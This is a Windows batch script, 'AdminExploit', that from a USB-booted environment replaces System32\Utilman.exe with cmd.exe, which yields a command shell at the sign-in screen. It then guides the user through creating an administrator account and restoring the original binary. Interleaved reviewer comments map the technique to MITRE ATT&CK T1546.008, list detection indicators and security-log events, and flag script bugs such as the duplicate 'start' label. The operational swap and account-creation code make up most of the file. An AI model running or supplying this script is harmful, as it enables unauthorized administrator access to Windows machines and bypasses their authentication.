adminexploit.bat
:start
cls
@echo off
rem Main menu: prints the option list, reads one line into %choice% and jumps
rem to the matching label (1bat, 2bat, 3bat, tutorial) or exits.
rem
rem What the file as a whole does, per its own menu text: from a USB-booted
rem environment it overwrites C:\Windows\System32\Utilman.exe with cmd.exe,
rem then guides the user through creating an administrator account, and can
rem later put the original Utilman.exe back. Swapping an accessibility binary
rem this way is catalogued as MITRE ATT&CK T1546.008 (Accessibility Features).
rem
rem Defender view: the swap needs offline write access to the system volume,
rem so full-disk encryption and a locked firmware boot order block it.
rem For detection, watch for System32\Utilman.exe whose hash, signature or
rem OriginalFileName no longer matches the genuine binary, and for a
rem Utilman.exe.backup file left in System32.
color 0a
title -- AdminExploit by DaddyParodz and MaRCoilBRaZ --
echo -- made by DaddyParodz and MaRCoilBRaZ --
echo -----------------------------------------------------------------------------------------------
echo select an option:
echo 1 - run this if you have booted the usb
echo 2 - run this to create an account and give it administrator privileges
echo 3 - run this to restore Utilman.exe (or simply from the desktop when you're done with admin account)
echo help - show the tutorial
echo exit - well, this explain itself
set /p choice=
rem NOTE(review): %choice% is expanded unquoted and compared case-sensitively,
rem so the typed text becomes part of the IF command line as-is.
if %choice% == 1 goto 1bat
if %choice% == 2 goto 2bat
if %choice% == 3 goto 3bat
if %choice% == help goto tutorial
if %choice% == exit exit
rem NOTE(review): a standalone "else" line is not a valid cmd statement; the
rem invalid-option screen below is reached by plain fall-through.
else goto eskere
:eskere
rem Invalid-option screen: shows a reminder, waits for a key, then jumps to
rem the label "start".
cls
echo -- please type only the option in the list --
echo -- every other option will bring you to this window --
pause
rem NOTE(review): this file defines the label "start" twice (the main menu
rem and the restore sub-menu). cmd's GOTO scans forward from the current
rem position before wrapping to the top of the file, so this jump presumably
rem lands on the later "start" (restore sub-menu), not the main menu - confirm.
goto start
:1bat
rem Option 1: copies Utilman.exe to Utilman.exe.backup, overwrites
rem Utilman.exe with cmd.exe, then reboots via wpeutil (a Windows PE tool,
rem so this branch is evidently meant for the USB-booted environment).
rem No command result is checked; the "created" and "done" messages are
rem printed whether or not the copies succeeded.
rem
rem Defender view: after this branch, System32\Utilman.exe is a byte-for-byte
rem copy of cmd.exe and System32\Utilman.exe.backup exists. Both are reliable
rem file-system indicators. File-integrity monitoring, or a process-creation
rem rule on utilman.exe whose OriginalFileName is Cmd.Exe, catches the swap.
cls
@echo off
color 0a
title -- cmd utilman.exe --
echo -- Made by DaddyParodz and MaRCoilBRaZ --
echo -- starting backup --
echo.
rem Assumes the installed Windows volume is mounted as C: in the boot
rem environment - TODO confirm. The copies below use absolute paths anyway.
C:
cd Windows
cd System32
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.backup
echo.
timeout /t 3
cls
echo --- Utilman.exe.backup created ---
echo.
echo ----------------------------------------------------------------------------------------------
echo -- replacing Utilman.exe with CMD administrator --
xcopy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
echo.
timeout /t 3
cls
echo --- cmd replace done --
echo.
pause
echo --- restarting system ---
echo -- please remove usb device after the screen goes black --
timeout /t 5
wpeutil reboot
exit
:2bat
rem Option 2: opens a second Command Prompt window and shows copypaste.txt
rem in Notepad, then tells the user to type the two commands from that file
rem with [name] and [password] filled in. The commands themselves live in
rem copypaste.txt, which is not part of this script.
rem
rem Defender view: per the menu text the result is a new local account with
rem administrator rights. Windows Security log events 4720 (user account
rem created) and 4732 (member added to a local group) record that, so alert
rem on unexpected additions to the local Administrators group.
cls
@echo off
color 0a
rem "start" with no arguments opens a new cmd window.
start
echo -- Made by DaddyParodz and MaRCoilBRaZ --
title -- admin account --
echo -- now is your turn --
echo ------------------------------------------------------------------------------------------------
start notepad "copypaste.txt"
echo ------------------------------------------------------------------------------------------------
echo -- write out this 2 command from the txt file in the cmd window that just appeared --
echo -- remember to replace the [name] and [password] with what you want --
pause
exit
:3bat
rem Option 3 (restore), step 1: warns that the restore must be run from a
rem logged-in administrator session, then asks for a y/n confirmation.
rem NOTE(review): purpose of the "shift /0" below is not evident from this
rem file; no positional parameters are read anywhere in it.
@shift /0
@echo off
cls
color 0a
title -- THIS WILL RESTORE THE ORIGINAL Utilman.exe --
echo -- Made by DaddyParodz and MaRCoilBRaZ --
echo ----------------------------------------------------------------------------------------
echo -- execute this command only if you are logged in as admin --
echo -- if you execute this on the "select user" screen, please close this command and log in as admin --
echo -- if you don't follow my instruction this command will not work --
pause
cls
echo are you logged in as administrator ? (Y/N)
set /p login=
rem The comparison is case-sensitive (no /i): only lowercase "y" or "n" match,
rem although the prompt shows uppercase. Anything else falls through to the
rem pause and then into the abort screen below.
if %login% == y goto start
if %login% == n goto escape
pause
:escape
rem Abort screen for the restore path: repeats the "admin only" reminder,
rem waits for a key and exits without touching any file.
cls
echo -- execute this command only if you are logged in as admin --
pause
exit
:start
rem Restore sub-menu (second definition of the label "start" in this file):
rem asks which restore method to use and jumps to label 1 or 2.
rem Input other than 1 or 2 matches neither IF and falls through into label 1.
echo select 2 (again, from usb boot cmd, not when logged into your new account) if 1 is not working (1/2)
set /p login=
if %login% == 1 goto 1
if %login% == 2 goto 2
:1
rem Restore method 1: grants the current user full control on Utilman.exe,
rem deletes it, grants full control on Utilman.exe.backup and copies the
rem backup back to Utilman.exe.
rem No command result is checked; "RESTORED" is printed unconditionally, which
rem is why the script tells the user to read the output above it.
rem
rem Remediation/forensics notes: the line that would delete the backup is
rem commented out, so Utilman.exe.backup (now carrying the extra full-control
rem ACE) stays in System32 as evidence that this script ran. After a restore,
rem confirm the file is the genuine signed binary (for example with
rem "sfc /scanfile=C:\Windows\System32\Utilman.exe") rather than trusting the
rem message below.
cls
echo -- restoring utilman.exe --
timeout /t 3
cls
echo.
echo Getting privileges over Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant %username%:F
del C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe.backup /grant %username%:F
rem The target was just deleted, so xcopy may stop to ask whether the
rem destination is a file or a directory - presumably answered by hand.
xcopy C:\Windows\System32\Utilman.exe.backup C:\Windows\System32\Utilman.exe
rem del C:\Windows\System32\Utilman.exe.backup
echo.
echo -- Original Utilman.exe RESTORED. --
echo.
echo read logs up here, if it didn't work, try selecting 2 instead of 1
echo bye bye
echo.
pause
echo.
exit
:2
rem Restore method 2: grants the current user full control on
rem C:\Windows\System32\Utilman.exe, deletes it, then copies a file named
rem Utilman.exe from the current directory of drive C: (relative path) into
rem System32. The messages below describe that source as "the usb".
rem
rem Integrity note: nothing verifies the replacement file. Whatever binary is
rem named Utilman.exe at the source location becomes the program launched
rem from the sign-in screen, so a restore done this way should be followed by
rem a signature/hash check of the installed file.
@echo off
cls
C:
icacls C:\Windows\System32\Utilman.exe /grant %username%:F
del C:\Windows\System32\Utilman.exe
copy Utilman.exe C:\Windows\System32\Utilman.exe
echo .
echo read the errors up here and check if it has successfully copied Utilman.exe from the usb to sys32
echo if not, read the manual mode tutorial on github or "tutorial" command.
echo.
echo bye.
pause
exit
:tutorial
rem Help option: switches the console colour, opens tutorial.txt in Notepad,
rem waits three seconds and jumps to the label "start".
rem NOTE(review): no "start" label follows this point in the file, so GOTO
rem presumably wraps around to the first one (the main menu) - confirm.
@echo off
color 0f
cls
echo -- the tutorial will be opened in notepad --
start notepad "tutorial.txt"
timeout /t 3
goto start